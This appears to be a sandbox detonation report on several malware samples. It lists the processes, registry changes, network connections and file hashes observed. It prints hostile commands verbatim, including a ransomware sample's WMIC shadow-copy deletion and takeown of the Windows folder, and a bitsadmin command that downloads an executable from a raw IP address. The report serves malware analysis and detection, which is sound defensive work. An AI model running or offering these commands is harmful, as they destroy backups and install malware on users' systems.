N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\T1.exe

"C:\Users\Admin\AppData\Local\Temp\T1.exe"

C:\Windows\SysWOW64\wbem\WMIC.exe

"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\"."

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\"."

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HIT BY RANSOMWARE.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 mail.gmx.net udp
DE 212.227.17.190:587 mail.gmx.net tcp

Files

memory/2112-0-0x000000007463E000-0x000000007463F000-memory.dmp

memory/2112-1-0x0000000000F30000-0x0000000000F3E000-memory.dmp

memory/2112-2-0x0000000074630000-0x0000000074D1E000-memory.dmp

memory/2112-20-0x000000007463E000-0x000000007463F000-memory.dmp

memory/2112-125-0x0000000074630000-0x0000000074D1E000-memory.dmp

C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\DEEPBLUE\PREVIEW.GIF.happy

MD5 1d31df3829f4c22e15d48faa61679175
SHA1 a2f40741e4b38319c0993b6842a315d548ea8e53
SHA256 c784a7c3216a8af2ffd71a4b8ed7e50c02f2fdfd76f6584e9fe2f8d8be92bd24
SHA512 32ac9fad436c872825cb07baa13c1dda3d638ca6ff128de18f3ce22e99d6603ab690d3d2bb63a33294d76c45a13af81cf48766128c7586332cd3dfaf52c4945d

C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.happy

MD5 24064cc0a264eabc08db1141c9fd5c3f
SHA1 6d1997210190df3bcb16d264f6276d0f7eadc4ef
SHA256 20dd983374512b42431442e956a8e7b558c15a2559dc46fa477f3b0dee4ef37d
SHA512 42db5e568e27b31d64a98478313fd3fc275d409bddeb22da6c4a52366c5e987b0b29a67315d3e4633c58e251b2f5b1cc513c318183fd69f840c692afc5ccaa98

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14828_.GIF.happy

MD5 392e471e1334f2e42ed0e311f769cdd8
SHA1 4cccd75b55a817606cc79138b01d351f82e34780
SHA256 d93bb0ba05f1986ecfe6037db60c7d9e3d0655f9c0e31b877db4c3056dd062f7
SHA512 8e315b82dc14a298cb73e287e0b346e480de3f6e277a8fd9b953dc6456416ccfe7ea13323fad27360d27621ead2f669dd053d54907bb50b3d5a8c68dc11dc7bd

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21299_.GIF.happy

MD5 b8e7100f81d47b3368d1dcd3a703f9a1
SHA1 c244f6dce97b9d619cf61d473da31abf604a87cb
SHA256 6a59cab4bcf3aa37263c176207fb2809ab98bbe1c33c9123f9a18209d6e8979e
SHA512 8cd7db7af1a8ca6aab263770aca9843aca45b9d19b4d4b49cac8594eba3e178e00b013b8bf912d64fe8b908e7c9bd2bcf90078c44e7247e45d0ebcff70b79b0f

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115843.GIF.happy

MD5 e26eab69fd7c3b7953c34ad85197ebac
SHA1 a60bd5acde6b26a26520bf8950700f8dcd7b74e6
SHA256 f5028b6c61015cc1639fed785e3c6432080dfb6a9be9a2c0be3edca304702e19
SHA512 88252580a546f96df185b300565ebcb7c63d2ed7c5c48197a2f8e82bbc00507449a5eb0cefc545c73dc15540a80e957eb8c9155324e5bd21cdf27055d484777e

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML.happy

MD5 f642ee90f1e5015e7ef8f9b32210b9c6
SHA1 2b965629f2a559338e9affcd304db5c26d22359b
SHA256 997403e2c520ce18d0c58797972506776f94f6c3d282739b2b885f35471839fa
SHA512 52bc40ecb1fb7d23be7bb710bac8738740056d60b30ab3cb5f35c333b8cb0bad4b1a67100913d5a17019404d95a0cb2240ca825be939590031300e802ab6bf9e

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.PL.XML.happy

MD5 ff375d9347491474f2c500f036751f2a
SHA1 6491d3091e6ec928cb43c4053443ef4ff9403528
SHA256 d4398c68525a3fae713194500851137670d3763f8cd61d027e274becdc058e17
SHA512 f3773d8d7f314f1e381e5a9b3504049ad4e9cc2248ea700d509aaf8d8efd2e8b19ce72e2185042c5ff072eceb170dd9c09bf2301e1691003db0a8736c5bafb68

C:\Users\Admin\Desktop\HIT BY RANSOMWARE.txt

MD5 67d1f04285eaabb5ef21969a6295b71f
SHA1 c253031dfa0c6aaf1a72fe31f50ae2937f384461
SHA256 6b94bc6ca76970e518a1341cce2c2842c965566b16389f4419d592bece446610
SHA512 2daf82cbc21d2837a35dab4ad48b95cea8a65719503750e93fd671bea100ab2aa9236e907e3a6615f890f020a91b019b8b2296565cc194d67c12f0f60ac95038

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

117s

Max time network

120s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\verhdiehndi.bat"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2480 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2480 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2480 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\verhdiehndi.bat"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high http://185.141.25.185/software.exe "C:\Users\Admin\AppData\Roaming\freegaza_israeli_killers.exe"

Network

Country Destination Domain Proto
AE 185.141.25.185:80 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner1.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner1.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner1.exe"

Network

N/A

Files

memory/2500-0-0x000007FEF5EC3000-0x000007FEF5EC4000-memory.dmp

memory/2500-1-0x00000000000D0000-0x00000000000F8000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

251s

Max time network

187s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sidacertification.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\sidacertification.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438408702" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{878B9261-A883-11EF-869D-46BBF83CD43C} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\sidacertification.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\sidacertification.exe

"C:\Users\Admin\AppData\Local\Temp\sidacertification.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2304 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.bing.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2508-0-0x0000000000220000-0x0000000000221000-memory.dmp

memory/2508-15-0x0000000000220000-0x0000000000221000-memory.dmp

memory/2508-14-0x0000000000400000-0x000000000050B000-memory.dmp

memory/2508-21-0x0000000000400000-0x000000000050B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab98E8.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar9978.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e11b84ac98958b66515181f50e633a1b
SHA1 602086d3a42003016ab52eeb4b4e88b2d22cfa77
SHA256 88b19e8a14ada53690165ca058f3f4f36bdb56f11a3fcb69d4b4daf46dcc32b6
SHA512 ed72f3622f9c2e89b087412d82d6206a9f2e2ea3be34619b0f66a11c2f1959b6cf39ba29e4cd9d23d7d2bf88e8b89829f9d9596df0ecf277e9f67eac7b0c033b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c98f59c4641032103406e2868f1a2de8
SHA1 a5acff05c6e3193ded7be820678af476cb5bd888
SHA256 c3077172ab065371b0e2a7bf74e05f063525bc147dfab188decd4bec72483bb3
SHA512 300a8ce8a24c894ca508e451e7d62045fea99fd4794c77d0cf7ac6607f2a1156b3746ef51d5bb28b8f39801f041ae08389907dc611ebaac2fadd8f626366b63e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2e09b16b9b3a6d5e406ec8a4c0a97664
SHA1 e74ed55b440768dc06d98b89106142768e11182a
SHA256 0bf433baa5e995c8a2614a6bcd06dbbce796a80f03682ea4753be5d26b8d1f1c
SHA512 c509192ae143b445d8047e3d084a3405ca2aefc6b9c556d8f3ca06229f3068fb705673c3339441fdfa5031627fa1e61d7b1af58f37e298c9b6d5c3b2b16bd8f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 65961613449d696376cff8cb2a617599
SHA1 28064e64da49086f96869fa01bae93c028cfb90f
SHA256 bc41045b5975ad38bd6960b6d0ec32f534a34d0339d353961031554c9e20bf25
SHA512 7964b18738dd900861bacbcb4ffc86ac4545978ac5515b2fafd707ede2abd8f8fc3a7243bc7659c63469450975bc93ac9a269d77ba5d15fd4a91c59bdaf8f8e5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c9ed35b030a354912e3e2965325bde0
SHA1 ebaf6d8eb3ac2db73acbcf9ad451f5711caa8400
SHA256 36acdbce60bf6159037c26263ec6d89bea786c2c11b3a6eb0177fd142dab118a
SHA512 d69eaca0ef5aec5ff75a3f503d9c3926e3ad249bafb35a849f34ae4019dfbe7696fc23b749a597e4bf9129186fd2cbd2f28dd987212b637b355204efbf8ef74a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0e084c441909734579c104be7264b972
SHA1 0df61faace8cfefcd778d9db6d8c29e9be3af0c3
SHA256 0215b9d4ea1ccf5749bbd61ec9a2e6bea23e1c6f33e8fed60576157fd30f17f7
SHA512 61e1e38a54807a87f675ec1e85af588bef68bef6201bc04373157cd6469f8466e6a711a6161bd77665d9e14b3b808d12bb562fa46c4ed28cc8c9a2685eda972d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dad7ab00e93d96c43e7b726361f3ef26
SHA1 49131dd990e94dd365acc8df3e293548088b9509
SHA256 78f32dd6ce2b01a5121db2d4c32b0e4539c23f50e049210c5adebce36cbd896a
SHA512 30f7f59444982d11dbf263617f0da2102e7532f6b072bc51a5fd235c789f925322624838cd5fcd9e460f4ad7c9dcf674c7ecd826b46739236517f3cbeb67f959

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f123b44725d7d941db61902aa198e894
SHA1 cadeb00a1c809a161f2d0a1bd1c036b57cf1380f
SHA256 5d1be7f002ab837e62fac50658db07b290212df7498dfe3992470aa1a9002393
SHA512 ed915060ff1ce2ce130aa0446dff5fff18504437f01c3ab7591f3a59f9442999020651538892ada770ede75c227cac262f1840261ce0226573472b26cda77172

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5c2c310fc155817af1a9c673a5268d2
SHA1 c13d73b08c6e290e56d65dda2282a2dba70c9fec
SHA256 efc753e725ec3a3776e0385c1723d09925f3686b3d3278952abfcc7c006ceb53
SHA512 17e3796cb9b21e883ed0c5c30bb2fafd4cef7191fbe5eaa47112207408a8069050ba77d310fc578f2db50175f98ab2b74c6e64ffe319f160fcb9e653bbf4db69

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9fa2c6ac32e37a494df95040ddc32fe1
SHA1 8bcc0c5c68c55c82925429c8a2fe56763de6d74e
SHA256 83c6a9f8d112cf27e4f2b986f31f46b522e400998b738edbdf70156074346c16
SHA512 8cc52f00b08cb9a96bc0c8de47eb6b300dad63c64a5055ab1a0cf22464c50d47228b9de35415e114aaa6fb57ea4afa4e67f0b31615d0c7ec141b95765e16c612

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e2f6ea44cdffe394168c0f9faeb62f14
SHA1 09cdd8ad74fc5708c38d5251c1d496a9f3b0479d
SHA256 c86232483ab98c0102b486fd32e8b77a3a530a146309ce7d2581914736fdf641
SHA512 3e4f8962cd30b3b81f75afd03becf27cb46fe6884d731ecd7c8693ee33a913ded271d85ef2327cd277a7eda1e6ba5de4839b36fe6eaa755539117636961021be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c06948088d05bf7a4c27e26f8ea82c90
SHA1 b4c3d89a54a1b520f8bbf29977bba0d6386c571a
SHA256 fdfafef40ba0d6f1056e7ac0afe1c3d26251677047139b71981eb013cb527e8f
SHA512 81727c82841c510b95307707df83705fd0d29f02abc3ce1154df5f0e7488f6147bf598e4877d3db3a11d60e7e4e92d59c70ba99f27e4ee8f4593e50659e7fcbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 39edc4b6de584723d24a3c4d5f312283
SHA1 8df29ac82579d2214c69b2bcbb2c78b63489b07e
SHA256 2bf57edeb3ffe742e06e9fcc1e07a4bb25f884feb867c7d86c40dcc1c0a29653
SHA512 f0f12e9d9f9353a7627cdfd1e6d05e3f9eadb6b7c263534ca5572d9ac48ea01dc2db33b17d57fda05906bf0b2ae99b6dd6e70de819dbadfdc2a1d03e59bf2853

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 313265e2b5be1c6c1922afd32b84e940
SHA1 c704e1cd3d95fa3b97178859e1dd7c007283fd41
SHA256 91b18beea0f2377e3fa262db4288b64ec2cbe097d0d1cf42532fe213be845863
SHA512 da896902aa2d96833bf15aa475ca1a381b46d079eca1b6b47f2be5d13b61f16d62c78a911a4df646ffe6eddeb5306e0eea881e6ca8d287414aa3b1e805b34cc8

